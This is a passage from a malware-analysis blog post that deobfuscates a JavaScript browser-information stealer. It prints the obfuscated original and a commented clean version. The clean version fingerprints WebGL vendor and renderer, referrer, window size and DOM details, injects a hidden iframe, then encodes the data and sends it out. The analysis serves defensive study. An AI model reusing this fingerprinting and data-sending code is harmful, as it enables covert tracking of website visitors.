(jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_56_50()(); jso$spliter_$af5097() } else { try { if (jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_55_55()(); jso$spliter_$af5098() }; qpjoj = ewjqj[_$_b5e6[36]](rujcj = trjej[ii]); if (qpjoj && jso$ft$uoel$_33((1 && lkjej._)(qpjoj[_$_b5e6[37]])) && jso$ft$boe$_61_61(_$_b5e6[38], qpjoj[_$_b5e6[37]])) { if ((1 && lkjej._)(qpjoj[_$_b5e6[39]])) { return }; if (jso$ft$uoel$_33(_$_b5e6)) { jso$ft$giden$_95_36af_53_48_55_55()(); jso$spliter_$af5099(); return } else { if ((1 && lkjej._)(qpjoj[_$_b5e6[40]])) { return } }; var rndjo = qpjoj[_$_b5e6[37]](qpjoj[_$_b5e6[40]](_$_b5e6[42])[_$_b5e6[41]]); var reredjej = qpjoj[_$_b5e6[37]](qpjoj[_$_b5e6[40]](_$_b5e6[42])[_$_b5e6[43]]); return jso$ft$boe$_33_61_61(qpjoj[_$_b5e6[39]]()[_$_b5e6[44]](_$_b5e6[42]), -1) ? jso$ft$boe$_43(rndjo + _$_b5e6[45], reredjej) : _$_b5e6[46] } } catch (e) {} } }; return iujyj[0] }; return iujyj[1] } } mljpj = {}; wef = {}; var _$_b5e6 = (_$af5082)("uOR%dee%n%entK%srddonmrieEslt%Pteor%E%fsnddtBgteAettFosiii%ntrHnn%wnginnsmrnRsnWle%naRreepftt%i%0egulbelyue%crotate%-%MraaoSeEnc%CRItrt%ptdl%rg%toeaseOr__eawwtsoilMmI%e_%ArrteelacMg%dp%sotE%NahyrayttBfGppoyucsrb%%iepBrarlcr%uterle_BefwyainCsSw %eiPp3NbepteloDkk%mx_erWree%Un-dDf%icet2_tyec%%n%ee%ded_sieEDn%%r%hLfebintoERoLttp%oetpot%MWj%trniUesDb_nti%dnWtiGnt-]t%%gLtxSbdEieinsgeOfwtcod0ylxssoeTante%ndWesbGSRgnStree%eeniiirEtu%weehdgoncNe%%rMvNSw GnLobgaKEeaooepwnLngkaonR_lETen VcHaeTd dmp%tseeepeprelzNo%vnestrDge.ul_lw woa%ndg%Ep%liteE%et%tj%LDd_wouenEe-bwsep%bhoCoopexiC%%AEGgg%mglbnttuKotdxet%bt_0ieorsefe%nux__G[NS_rpm%a%V%Wcpd", 6140204); if (!_$af5077) { _$af5082(); _$af5085(); } else {}; !_$af5077(); function jso$spliter_$af5086(b, i, z) { i._[b._] = i._[z._] } function jso$spliter_$af5087(z, i, n) { i._[z._] = n._ } function jso$spliter_$af5088(e, w, g) { e._ = jso$ft$boe$_37((jso$ft$boe$_43(w._, g._)), 6286363) } function jso$spliter_$af5089() { jso$ft$giden$mljpj()[_$_b5e6[5]] = 0 } function jso$spliter_$af5090() { jso$ft$giden$mljpj()[_$_b5e6[7]] = jso$ft$giden$document()[_$_b5e6[8]] } function jso$spliter_$af5091() { jso$ft$giden$mljpj()[_$_b5e6[9]] = jso$ft$giden$window()[_$_b5e6[10]] } function jso$spliter_$af5092() { _$af5077 = null } function jso$spliter_$af5093() { jso$ft$giden$mljpj()[_$_b5e6[11]] = jso$ft$giden$window()[_$_b5e6[12]] } function jso$spliter_$af5096() { _$af5077 = 1 } function jso$spliter_$af5100(iiop) { iiop._[_$_b5e6[49]][_$_b5e6[48]] = _$_b5e6[50] } function jso$spliter_$af5101(jbt, _c, ja) { if (jso$ft$boe$_61_61(jbt._, 0)) { _c._ = ja._; _c._[_$_b5e6[56]][_$_b5e6[55]] = [] } } function jso$spliter_$af5102(_c, ja) { _c._[_$_b5e6[56]][_$_b5e6[55]][_c._[_$_b5e6[56]][_$_b5e6[55]][_$_b5e6[16]]] = ja._ } function jso$spliter_$af5103() { _$af5082 = null } function jso$spliter_$af5104() { _$af5077 = 0 } function jso$spliter_$af5105() { if (jso$ft$uoel$_33(_$af5082)) { _$af5077 = false } } function jso$spliter_$af5106(aca) { aca._++ } function jso$spliter_$af5094() { mljpj[_$_b5e6[5]]++ } function jso$spliter_$af5095() { jso$ft$giden$wef()[_$_b5e6[4]] = true } function jso$spliter_$af5097() { _$af5077 = 0 } function jso$spliter_$af5098() { _$af5082 = 1 } function jso$spliter_$af5099() { _$af5082 = null }'
)(3597)
}();
Cleaning
At this point, I began cleaning the obfuscated string (say, X
) that is the second argument of P()
call. The value 3597
is an argument to X
and there is no other use for function W()
and variable, P
. So, I’ve removed that code from the final cleaned version. Also, in order to make the code more readable and intuitive, I initialized the following variables based on their usage in the script:
globalVar1 = 0
mljpj = {'cid': 0}
wef = {}
globalVar2 = 1
/*
Purpose: Browser information stealer
Tactic:
1. Retrieves the following information:
a. browser vendor (Ex: Google, Inc) and graphics renderer (Ex: Intel HD Graphics 630 Direct3D11 vs_5_0 ps_5_0)
b. referrer webpage
c. browser width and height
d. number of script tags in the webpage
e. changes made to the webpage's DOM tree
2. Injects an invisible IFrame and counts something that I have not been able to figure out
3. Encodes the gathered information and sends it (to a remote destination perhaps)
*/
function() {
function function3(doesprototypeExistFunc) {
return function() {
var errors = ['Supported. Disabled', 'WebGL not supported'];
// Determining graphics rendering interface
if (WebGLRenderingContext) {
var canvasContext;
var index = 4;
var canvasNode = document.createElement('canvas');
var webglContext = ['webkit-3d', 'moz-webgl', 'experimental-webgl', 'webgl'];
while (index--) {
try {
canvasContext = canvasNode['getContext'](webglContext[index]);
if (canvasContext && !(doesprototypeExistFunc)(canvasContext['getParameter']) && (canvasContext['getParameter'] == 'function')) {
// Get vendor string (Ex: Google Inc.)
var vendorString = canvasContext['getParameter'](canvasContext['getExtension']('WEBGL_debug_renderer_info')['UNMASKED_VENDOR_WEBGL']);
// Get renderer string (Ex: Intel HD Graphics 630 Direct3D11 vs_5_0 ps_5_0)
var rendererString = canvasContext['getParameter'](canvasContext['getExtension']('WEBGL_debug_renderer_info')['UNMASKED_RENDERER_WEBGL']);
// If 'WEBGL_debug_renderer_info' extension supported, return concatenated vendor and renderer string
return (canvasContext['getSupportedExtensions']()['indexOf']('WEBGL_debug_renderer_info') !== -1) ? (vendorString + ' ' + rendererString) : '';
}
} catch (e) {}
}
// If graphics rendering is supported but is disabled
return errors[0];
}
// If graphics rendering is unsupported
return errors[1];
}
}
// Not sure what this function counts, but it may have something to do with the created IFrame's properties
function function1() {
return function(iframeWindow, num) {
var tempIframeWindow, obj4 = {};
tempIframeWindow = iframeWindow;
//tempIframeWindow.Node.data = [];
//tempIframeWindow.Node.data[tempIframeWindow.Node.data.length] = iframeWindow;
obj4 = 0;
var iframeObj = document.domApisArray[iframeWindow]
if ((iframeObj == 'object') || (iframeObj == 'function') &&
(iframeWindow != null) && (iframeWindow != tempIframeWindow.parent) && (iframeWindow != tempIframeWindow.top) && (iframeWindow != tempIframeWindow.opener)) {
for (var iframeWindowProps of Reflect.ownKeys(iframeWindow)) {
try {
if ((iframeWindowProps == 'all') ||
((typeof(iframeWindow['__lookupGetter__']) == 'function') && (typeof(iframeWindow['__lookupGetter__'](iframeWindowProps)) == 'function')) ||
((typeof(iframeWindow['__lookupSetter__']) == 'function') && (typeof(iframeWindow['__lookupSetter__'](iframeWindowProps)) == 'function'))) {
obj4++;
} else {
if ((iframeObj == 'object')) {
if (num < 30) {
obj4 += (tempIframeWindow)(iframeWindow[iframeWindowProps], (num + 1), tempIframeWindow);
}
} else if ((iframeObj == 'function')) {
var zrz = escape(iframeWindow[iframeWindowProps])['length'];
if (zrz != 2) {
obj4 += escape(iframeWindow[iframeWindowProps])['length'];
}
if (num < 30) {
obj4 += (tempIframeWindow)(iframeWindow[iframeWindowProps]['prototype'], (num + 1), tempIframeWindow);
}
}
}
} catch (e) {};
}
obj4++;
}
}
return obj4;
}
function function2() {
var iframeElement;
// Checks if elementX object has a prototype property. If so, set wef['t'] = true and return true else return false
doesprototypeExistFunc = function(elementX) { if('prototype' in elementX) { wef['t'] = true; return true } else return false; }
// Returns browser vendor and graphics renderer (Ex: Intel HD Graphics 630 Direct3D11 vs_5_0 ps_5_0)
webGLString = function3(doesprototypeExistFunc);
mljpj.wsg = (webGLString)();
// Not sure what this represents
window.wef = {'c': 2000 + mljpj.cid, 't': false};
// Returns the web page URL which led to the current page
mljpj.dsr = document.referrer;
// Width of browser window in pixels
mljpj.wsi = window.innerWidth;
// Height of browser window in pixels
mljpj.wst = window.innerHeight;
// Not sure what this represents (Ex: 62-56)
mljpj['wsc'] = escape(Node.prototype.appendChild).length + '-' + escape(document.write).length;
// Counts number of script tags in current webpage
mljpj.psn = document.getElementsByTagName('SCRIPT').length;
// Replaces instances of MutationObserver in the webpage source code with the function
// Counts changes to the webpage
mljpj.est = 0;
document.all[0].innerHTML.replace(/MutationObserver/g, function(m, n) { mljpj.est++; return 'MutationObserver'; });
try {
// Create an invisible IFrame and append it to the DOM tree
iframeElement = document.createElement("iframe");
iframeElement.style.display = 'none';
document.body.appendChild(iframeElement);
// Not sure what below function counts
mljpj.wsf = (function1())(iframeElement.contentDocument.defaultView, 0);
} catch (e) {};
// Convert mljpj JS object to a string, base64 encode it and URL encodes it twice
wef.d = escape(escape(btoa(JSON.stringify(mljpj))));
// Convert wef JS object to a string and send it, to a remote server perhaps
jbj.send(JSON.stringify(wef));
}
function permuteStringRetArray(stringArg, num) {
var ch, index1, index2, temp, tempX, tempY, tempNum, stringArgArray;
var stringArgLen;
tempNum = num;
stringArgArray = [];
stringArgLen = stringArg.length;
// Create array containing stringArg characters
for (var f = 0; f < stringArgLen; f++) {
stringArgArray[f] = stringArg.charAt(f);
}
for (var f = 0; f < stringArgLen; f++) {
// Determine indices at which values will be swapped
tempX = tempNum * (f + 447) + (tempNum % 50266);
tempY = tempNum * (f + 203) + (tempNum % 53635);
index1 = tempX % stringArgLen;
index2 = tempY % stringArgLen;
// Swap values at indices
temp = stringArgArray[index1];
stringArgArray[index1] = stringArgArray[index2];
stringArgArray[index2] = temp;
tempNum = (tempX + tempY) % 6286363;
}
ch = String.fromCharCode(127);
// Return array containing DOM APIs
return stringArgArray.join("").split("%").join(ch).split("#1").join("%").split("#0").join("#").split(ch);
}
globalVar1 = 0
mljpj = {'cid': 0}
wef = {}
globalVar2 = 1
/*
Get an array containing DOM APIs:
["wef", "c", "2000", "cid", "t", "est", "wsg", "dsr", "referrer", "wsi", "innerWidth", "wst", "innerHeight", "innerHTML", "all", "wsc", "length", "appendChild", "prototype", "-", "write", "psn", "SCRIPT", "getElementsByTagName", "MutationObserver", "replace", "toString", "[object WebGLRenderingContext]", "createElement", "canvas", "webkit-3d", "moz-webgl", "experimental-webgl", "webgl", "Supported. Disabled", "WebGL not supported", "getContext", "getParameter", "function", "getSupportedExtensions", "getExtension", "UNMASKED_VENDOR_WEBGL", "WEBGL_debug_renderer_info", "UNMASKED_RENDERER_WEBGL", "indexOf", " ", "", "IFRAME", "display", "style", "none", "body", "wsf", "defaultView", "contentDocument", "data", "Node", "object", "parent", "top", "opener", "ownKeys", "__lookupGetter__", "__lookupSetter__", "d", "stringify", "send"]
*/
var domApisArray = (permuteStringRetArray)("uOR%dee%n%entK%srddonmrieEslt%Pteor%E%fsnddtBgteAettFosiii%ntrHnn%wnginnsmrnRsnWle%naRreepftt%i%0egulbelyue%crotate%-%MraaoSeEnc%CRItrt%ptdl%rg%toeaseOr__eawwtsoilMmI%e_%ArrteelacMg%dp%sotE%NahyrayttBfGppoyucsrb%%iepBrarlcr%uterle_BefwyainCsSw %eiPp3NbepteloDkk%mx_erWree%Un-dDf%icet2_tyec%%n%ee%ded_sieEDn%%r%hLfebintoERoLttp%oetpot%MWj%trniUesDb_nti%dnWtiGnt-]t%%gLtxSbdEieinsgeOfwtcod0ylxssoeTante%ndWesbGSRgnStree%eeniiirEtu%weehdgoncNe%%rMvNSw GnLobgaKEeaooepwnLngkaonR_lETen VcHaeTd dmp%tseeepeprelzNo%vnestrDge.ul_lw woa%ndg%Ep%liteE%et%tj%LDd_wouenEe-bwsep%bhoCoopexiC%%AEGgg%mglbnttuKotdxet%bt_0ieorsefe%nux__G[NS_rpm%a%V%Wcpd", 6140204);
!function2();
}();
Thanks for reading!
In this article, I described my procedure to deobfuscate an obfuscated JS string. Personally, the highlight of this deobfuscation procedure was to recognize that the string after the first round of base64
decoding was salted with redundant characters. This JS code could be injected into web pages or delivered through malicious ads in order to steal user browser information.
Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!